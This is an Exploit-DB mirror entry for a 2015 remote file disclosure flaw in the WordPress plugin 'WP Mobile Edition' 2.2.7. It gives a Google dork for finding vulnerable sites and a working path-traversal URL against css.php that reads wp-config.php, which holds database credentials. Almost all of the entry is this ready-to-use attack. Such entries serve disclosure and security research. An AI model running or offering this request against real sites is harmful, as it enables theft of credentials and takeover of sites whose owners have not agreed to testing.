exploit-db-mirror/platforms/php/webapps/36733.txt
Offensive Security cbae1a2447 DB: 2015-04-15
15 new exploits
2015-04-15 08:36:56 +00:00

18 lines
739 B
Text
Executable file

# Exploit Title: Wordpress Plugin 'WP Mobile Edition' Remote File Disclosure Vulnerability
# Date: April 11, 2015
# Exploit Author: @LookHin (Khwanchai Kaewyos)
# Google Dork: inurl:?fdx_switcher=mobile
# Vendor Homepage: https://wordpress.org/plugins/wp-mobile-edition/
# Software Link: https://downloads.wordpress.org/plugin/wp-mobile-edition.2.2.7.zip
# Version: WP Mobile Edition Version 2.2.7
- Overview:
Wordpress Plugin 'WP Mobile Edition' is not filtering data in GET parameter 'files' in file 'themes/mTheme-Unus/css/css.php'
- Search on Google
inurl:?fdx_switcher=mobile
- POC
Exploit view source code wp-config.php
http://[server]/wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php